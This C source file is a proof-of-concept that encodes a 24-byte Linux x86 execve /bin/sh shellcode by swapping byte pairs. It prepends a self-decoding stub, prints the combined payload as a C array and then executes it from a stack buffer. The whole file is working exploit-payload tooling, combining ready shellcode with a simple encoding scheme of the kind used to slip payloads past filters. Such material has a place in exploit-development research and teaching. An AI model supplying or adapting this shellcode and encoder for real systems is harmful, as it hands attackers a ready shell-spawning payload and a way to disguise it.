/*
 * Proof-of-concept to test the decoder
 *
 * Rodrigo Rubira Branco <rodrigo@kernelhacking.com>
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void            print_code(char *data);

char decoder[] =
        "\xeb\x20\x5e\x31\xc9\x31\xc0\x31\xdb\xb1\x00\x8a\x44\x0e\xff"
        "\x8a\x5c\x0e\xfe\x88\x5c\x0e\xff\x88\x44\x0e\xfe\x80\xe9\x02"
        "\x75\xeb\xeb\x05\xe8\xdb\xff\xff\xff";

/* Linux execve /bin/sh shellcode */
char shellcode[]=           /*  24 bytes                          */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x99"                  /*  cltd                              */
    "\xb0\x0b"              /*  movb    $0x0b,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
;

main(int argc,char **argv) {
    char buffer[16384],*p;
    char tmp;
    int i;

    decoder[10]=(unsigned char)strlen(shellcode);

    for(i=0;i<strlen(shellcode);i+=2) {
	tmp=shellcode[i];
	shellcode[i]=shellcode[i+1];
	shellcode[i+1]=tmp;
    }

    p=buffer;    
    for(i=0;i<strlen(decoder);i++) *p++=decoder[i];
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    p=0;

	print_code(buffer);
    (*(void (*)())buffer)();
}

void print_code(char *data) {

  int i,l = 15;


  printf("\n\nchar code[] =\n");

  for (i = 0; i < strlen(data); ++i) {
    if (l >= 15) {
      if (i)
        printf("\"\n");
      printf("\t\"");
      l = 0;
    }
    ++l;
    printf("\\x%02x", ((unsigned char *)data)[i]);
  }
  printf("\";\n\n\n");
}